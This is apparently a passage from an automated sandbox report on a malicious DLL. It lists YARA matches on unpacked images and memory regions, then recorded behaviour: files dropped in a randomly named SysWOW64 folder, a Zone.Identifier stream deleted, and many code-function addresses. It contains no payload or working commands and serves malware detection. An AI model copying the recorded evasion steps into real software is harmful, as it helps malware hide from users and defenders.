                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.770000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.3332418.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.1100000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.860000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.932160.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.c50000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.562952810.0000000000DFA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.620708124.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.572742527.0000000000C30000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.600312961.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.574084916.0000000000C7A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.577604622.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.599173428.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.599105151.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.575882015.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.661109523.00000000035A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.522035243.0000000000785000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.600444475.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.568041715.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.765865481.0000000000C4D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.660358890.000000000331A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.562904188.0000000000C50000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.534275093.0000000000860000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.566098694.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.562932146.0000000000770000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.563477731.000000000091A000.00000004.00000020.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Source: efELSMI5R4.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 168 -p 6404 -ip 6404
                      Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.pee:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Bbinmhqtvqxlwm\Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011212912_2_01121291
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110CB132_2_0110CB13
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01104D1E2_2_01104D1E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111970A2_2_0111970A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111E10A2_2_0111E10A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01113D0C2_2_01113D0C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111BF0C2_2_0111BF0C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111590E2_2_0111590E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111CD352_2_0111CD35
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110F73B2_2_0110F73B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011191242_2_01119124
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110A92F2_2_0110A92F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011165402_2_01116540
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011203702_2_01120370
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110BD612_2_0110BD61
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110CF6E2_2_0110CF6E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011115912_2_01111591
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110B1912_2_0110B191
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011077952_2_01107795
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01108D802_2_01108D80
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01104B812_2_01104B81
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011137822_2_01113782
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111DB872_2_0111DB87
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110358B2_2_0110358B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111E3B52_2_0111E3B5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011185B82_2_011185B8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011043BE2_2_011043BE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011059BF2_2_011059BF
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111D7BE2_2_0111D7BE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011189A22_2_011189A2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111DDA52_2_0111DDA5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01110BA42_2_01110BA4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111E5A72_2_0111E5A7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011075D22_2_011075D2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011019C02_2_011019C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110A3E72_2_0110A3E7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111EDED2_2_0111EDED
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011051EC2_2_011051EC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0112261E2_2_0112261E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111C2052_2_0111C205
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110800A2_2_0110800A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011034322_2_01103432
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110243F2_2_0110243F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011098242_2_01109824
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011032282_2_01103228
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111282D2_2_0111282D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011064532_2_01106453
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111EA552_2_0111EA55
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110CE5A2_2_0110CE5A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011130432_2_01113043
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110AE432_2_0110AE43
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011174452_2_01117445
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110544C2_2_0110544C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110AA4E2_2_0110AA4E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111B6772_2_0111B677
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110FA782_2_0110FA78
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110387F2_2_0110387F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110EE602_2_0110EE60
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110B4642_2_0110B464
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011068692_2_01106869
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01103A6C2_2_01103A6C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111CE902_2_0111CE90
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01110A932_2_01110A93
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01110E972_2_01110E97
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111E8992_2_0111E899
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111A29B2_2_0111A29B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111009A2_2_0111009A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110FE9D2_2_0110FE9D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110A0832_2_0110A083
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110F48A2_2_0110F48A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011152D12_2_011152D1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011090D42_2_011090D4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011128D52_2_011128D5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01121CDB2_2_01121CDB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011092C12_2_011092C1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01102CC22_2_01102CC2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011220CE2_2_011220CE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011110CD2_2_011110CD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011084F02_2_011084F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011162F52_2_011162F5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01114CF52_2_01114CF5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011046FA2_2_011046FA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01101EFB2_2_01101EFB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011140FE2_2_011140FE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011040E22_2_011040E2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011156E92_2_011156E9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110C0EA2_2_0110C0EA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECD77B42_2_6ECD77B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECD9F102_2_6ECD9F10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECD1DE02_2_6ECD1DE0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECDD5302_2_6ECDD530
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECD3A902_2_6ECD3A90
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECE03802_2_6ECE0380
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECEE3A12_2_6ECEE3A1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECE10C02_2_6ECE10C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECDA8902_2_6ECDA890
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECDE8902_2_6ECDE890
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECD68B02_2_6ECD68B0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECD60702_2_6ECD6070
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008812915_2_00881291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008820CE5_2_008820CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086A0835_2_0086A083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086F48A5_2_0086F48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00870E975_2_00870E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00870A935_2_00870A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087CE905_2_0087CE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086FE9D5_2_0086FE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087A29B5_2_0087A29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087009A5_2_0087009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087E8995_2_0087E899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00862CC25_2_00862CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008692C15_2_008692C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008710CD5_2_008710CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008690D45_2_008690D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008728D55_2_008728D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00881CDB5_2_00881CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008752D15_2_008752D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008640E25_2_008640E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086C0EA5_2_0086C0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008756E95_2_008756E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008762F55_2_008762F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00874CF55_2_00874CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008684F05_2_008684F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008740FE5_2_008740FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008646FA5_2_008646FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00861EFB5_2_00861EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087C2055_2_0087C205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086800A5_2_0086800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0088261E5_2_0088261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008698245_2_00869824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087282D5_2_0087282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008632285_2_00863228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008634325_2_00863432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086243F5_2_0086243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008774455_2_00877445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008730435_2_00873043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086AE435_2_0086AE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086AA4E5_2_0086AA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086544C5_2_0086544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087EA555_2_0087EA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008664535_2_00866453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086CE5A5_2_0086CE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086B4645_2_0086B464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086EE605_2_0086EE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00863A6C5_2_00863A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008668695_2_00866869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087B6775_2_0087B677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086387F5_2_0086387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086FA785_2_0086FA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087DB875_2_0087DB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008737825_2_00873782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00868D805_2_00868D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00864B815_2_00864B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086358B5_2_0086358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008677955_2_00867795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008715915_2_00871591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086B1915_2_0086B191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087E5A75_2_0087E5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087DDA55_2_0087DDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00870BA45_2_00870BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008789A25_2_008789A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087E3B55_2_0087E3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008643BE5_2_008643BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008659BF5_2_008659BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087D7BE5_2_0087D7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008785B85_2_008785B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008619C05_2_008619C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008675D25_2_008675D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086A3E75_2_0086A3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087EDED5_2_0087EDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008651EC5_2_008651EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087590E5_2_0087590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00873D0C5_2_00873D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087BF0C5_2_0087BF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087970A5_2_0087970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087E10A5_2_0087E10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086CB135_2_0086CB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00864D1E5_2_00864D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008791245_2_00879124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086A92F5_2_0086A92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087CD355_2_0087CD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086F73B5_2_0086F73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008765405_2_00876540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086BD615_2_0086BD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086CF6E5_2_0086CF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008803705_2_00880370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECD77B45_2_6ECD77B4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECD9F105_2_6ECD9F10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECD1DE05_2_6ECD1DE0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECDD5305_2_6ECDD530
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECD3A905_2_6ECD3A90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECE03805_2_6ECE0380
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECEE3A15_2_6ECEE3A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECE10C05_2_6ECE10C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECDA8905_2_6ECDA890
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECDE8905_2_6ECDE890
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECD68B05_2_6ECD68B0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECD60705_2_6ECD6070
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078EA556_2_0078EA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007912916_2_00791291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077387F6_2_0077387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078B6776_2_0078B677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077FA786_2_0077FA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077B4646_2_0077B464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077EE606_2_0077EE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00773A6C6_2_00773A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007768696_2_00776869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007764536_2_00776453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077CE5A6_2_0077CE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077AE436_2_0077AE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077AA4E6_2_0077AA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007830436_2_00783043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077544C6_2_0077544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007874456_2_00787445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007734326_2_00773432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077243F6_2_0077243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007798246_2_00779824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078282D6_2_0078282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007732286_2_00773228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0079261E6_2_0079261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078C2056_2_0078C205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077800A6_2_0077800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007840FE6_2_007840FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007784F06_2_007784F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00771EFB6_2_00771EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007862F56_2_007862F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007746FA6_2_007746FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00784CF56_2_00784CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007856E96_2_007856E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007740E26_2_007740E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077C0EA6_2_0077C0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00791CDB6_2_00791CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007790D46_2_007790D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007852D16_2_007852D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007828D56_2_007828D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00772CC26_2_00772CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007810CD6_2_007810CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007792C16_2_007792C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007920CE6_2_007920CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078E8996_2_0078E899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078009A6_2_0078009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078A29B6_2_0078A29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078CE906_2_0078CE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077FE9D6_2_0077FE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00780A936_2_00780A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00780E976_2_00780E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077A0836_2_0077A083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077F48A6_2_0077F48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007903706_2_00790370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077BD616_2_0077BD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077CF6E6_2_0077CF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007865406_2_00786540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077F73B6_2_0077F73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078CD356_2_0078CD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007891246_2_00789124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077CB136_2_0077CB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00774D1E6_2_00774D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078970A6_2_0078970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078E10A6_2_0078E10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00783D0C6_2_00783D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078BF0C6_2_0078BF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078590E6_2_0078590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077A3E76_2_0077A3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078EDED6_2_0078EDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007751EC6_2_007751EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007775D26_2_007775D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007719C06_2_007719C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007885B86_2_007885B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078D7BE6_2_0078D7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007759BF6_2_007759BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007743BE6_2_007743BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078E3B56_2_0078E3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007889A26_2_007889A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00780BA46_2_00780BA4
